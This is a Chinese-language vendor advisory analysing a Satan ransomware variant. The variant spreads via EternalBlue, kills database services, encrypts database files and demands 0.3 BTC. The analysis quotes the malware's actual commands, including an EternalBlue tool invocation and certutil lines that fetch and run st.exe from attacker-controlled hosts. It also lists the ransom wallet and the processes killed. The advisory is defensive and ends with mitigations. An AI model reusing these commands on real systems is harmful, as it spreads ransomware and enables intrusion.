Satan勒索病毒最新變種預警

近日，深信服EDR安全團隊接到用戶反饋，其內網有大量伺服器中了勒索病毒，文檔被加密。經過我們跟蹤分析，發現這是Satan勒索病毒最新變種。

此病毒變種，利用永恆之藍漏洞進行橫向傳播，重點針對資料庫文件進行高強度的加密，並索取0.3個比特幣作為贖金。

其攻擊場景如下：

概述

勒索病毒運行後，病毒開始加密系統里的相關後綴名的文件為.satan後綴，然後在相應的目錄生成勒索信息的TXT文件，如圖所示：

病毒分析

母體樣本分析st.exe

(1)從伺服器上下載ms.exe（永恆之藍工具包）和Client.exe（Satan勒索樣本）並運行，運行後獲取本地IP網段，然後利用永恆之藍工具包里的組件發起攻擊，感染其他主機，如下圖所示：

下載運行之後，創建一個循環執行的線程，執行永恆之藍攻擊，如下圖所示：

相應的攻擊代碼如下：

利用ShellExecute運行cmd.exe，執行

「/c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp IP地址 &

star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp IP地址」

永恆之藍利用工具包分析ms.exe

(1)母體ms.exe是一個SFX自解壓文件，運行之後，解壓自身到C:\Users\All Users目錄下，如下圖所示：

(2)首先通過blue.exe進行IP段掃描，然後執行永恆之藍SMB漏洞溢出攻擊，如下圖所示：

(3)永恆之藍漏洞攻擊成功之後，利用star.exe載入Payload(down64.dll)到攻擊之後主機上運行ShellCode代碼，然後通過網路去下載st.exe母體樣本運行，如下圖所示：

相關的shellcode代碼如下圖所示:

cmd.exe /c certutil.exe -urlcache -split -f http://61.100.3.151/data/log/st.exe c:/st.exe & c:st.exe

它會從伺服器61.100.3.151上下載st.exe母體進行執行，同時我調試發現了在down86.xll這個Payload上，下載的伺服器地址發生了改變，如下圖所示：

相關的命令如下：

cmd.exe /c certutil.exe -urlcache -split -f http://helpu.co.kr/down/st.exe c:/st.exe & c:st.exe

通過查詢這個域名，發現是一個韓國的網站，可能這個網站已經被黑客攻陷了，利用它來傳播自己的木馬和勒索樣本，如下所示：

勒索樣本分析client.exe

(1)從網上下載最新的Satan勒索病毒到用戶C盤根目錄，如下圖所示：

下載更新的網址：http://61.100.3.151/data/notice.exe，下載之後如圖所示：

(2)在C盤根目錄生成勒索信息，如下圖所示：

生成之後的勒索信息ReadMe_@.TXT文本內容為：

勒索信息提供了三種語言：英語、漢語、韓語

勒索BitCoin錢包地址：1BEDcx8n4PdydUNC4gcwLSbUCVksJSMuo8

(3)上傳收集到的用戶的機器信息，如下圖所示：

(4)上傳之後設置相應的註冊表項，如下圖所示：

(5)關閉相關的SQL服務，如下圖所示：

關閉的SQL相關的服務如下：

MySQL、MySQLa、SQLWriter、SQLSERVERAGENT、MSSQLFDLauncher、MSSQLSERVER

(6)結束資料庫相關的進程，如下圖所示：

結束的進程列表如下：

sqlservr.exe、mysqld.exe、nmesrvc.exe、sqlagent.exe、fdhost.exe、fdlauncher.exe

reportingservicesservice.exe、omtsreco.exe、tnslsnr.exe、oracle.exe

emagent.exe、perl.exe、sqlwriter.exe、mysqld-nt.exe

(7)開始加密文件，當文件在以下目錄下時，不加密文件，如圖所示：

相應的目錄列表：

windows、boot、i386、st_v2、intel、recycle、jdk、lib、lib、all users

360rec、360sec、360sand、favourites、common files、internet explorer

msbuild、public、360downloads

(8)Satan勒索主要是對資料庫文件進行加密操作，判斷文件後綴，如果後綴為如下列表：

mdf、ldf、myd、myi、frm、dbf、bak、sql、rar、zip、dmp

時，則加密相應的文件，如果後綴為如下列表：

cab、dll、msi、exe、lib、iso、bin、bmp、tmp、log、ocx、chm、dat、sys、wim、dic、sdi、lnk、gho、pbk

時，則不加密相應的文件，如下圖所示：

(9)創建加密函數，對文件進行加密，如圖所示：

加密文件，如圖所示：

(10)最後通過ShellExecuteA執行之前下載更新的Satan勒索病毒樣本，如圖所示：

傳播方式

這個勒索病毒主要通過郵件、漏洞、垃圾網站的方式進行傳播，其自身不具備橫向感染的能力，但其母體會通過永恆之藍進行傳播此病毒。

解決方案

對於企業用戶，推薦採用深信服安全感知+NGAF+EDR的綜合解決方案：

1.如果永恆之藍攻擊一旦從邊界進入內網，此時屬於內網橫行傳播，建議使用深信服安全感知來探測永恆之藍攻擊的移動情況和內網安全狀況。

2.從近一段時間應急響應事件來看，攻擊者大多是利用永恆之藍漏洞入侵伺服器，所以建議深信服下一代防火牆（NGAF）客戶，及時更新規則庫至最新版本，並開啟安全防護，可輕鬆防禦此高危風險。

3.深信服終端檢測響應平台（EDR）提供端點防護和病毒清理功能，可以非常直接有效的清除相關病毒。

除此之外深信服提醒用戶，日常防範措施：

1.不要點擊來源不明的郵件附件，不從不明網站下載軟體

2.及時給主機打上永恆之藍漏洞補丁，修復此漏洞

3.對重要的數據文件定期進行非本地備份

4.盡量關閉不必要的文件共享許可權以及關閉不必要的埠，如：445,135,139,3389等

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！